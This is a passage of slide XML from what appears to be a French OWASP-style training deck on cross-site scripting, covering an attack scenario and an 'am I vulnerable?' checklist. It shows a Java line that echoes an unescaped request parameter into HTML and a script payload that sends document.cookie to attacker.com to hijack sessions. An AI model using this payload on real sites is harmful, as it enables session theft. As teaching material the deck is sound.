                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>que</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>l’ensemble</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>données</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>qu’il</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>traite</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérez également l'impact commercial d’une exposition publique de la vulnérabilité</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Exemple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scénario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’attaque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utilise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>données</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fiables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la construction du fragment HTML sans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’avoir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>échappée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>au </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>préalable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(String) page += "&lt;input name='creditcard' type='TEXT‘</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  value='" + request.getParameter("CC") + "'&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’attaquant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>modifie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>paramètre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ‘CC’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>leur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>navigateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pour:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'&gt;&lt;script&gt;document.location=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  'http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  foo='+document.cookie&lt;/script&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cela provoque l'envoi de l'ID de session de la victime au site web de l'attaquant, permettant à l'attaquant de détourner la session en cours de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l'utilisateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>noter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attaquants</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peuvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aussi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utiliser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XSS pour  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tromper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contremesures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mises</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> en place pour se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protéger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attaques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> CSRF. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> A8 pour plus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> CSRF.</a:t>
            </a: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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vulnérable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vous êtes vulnérable si vous ne vous assurez pas que toute donnée transmise est correctement échappée ou qu’une validation a été réalisée pour en contrôler la fiabilité, ceci avant d’être incluse dans la page retournée au navigateur. Sans échappement ou  validation adéquate, une telle donnée sera interprétée comme du contenu exécutable par le navigateur. Si AJAX est utilisé pour mettre-à-jour dynamiquement la page, utilisez-vous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>outils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automatisés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peuvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> identifier des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>failles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> XSS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cependant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chaque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> application  à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
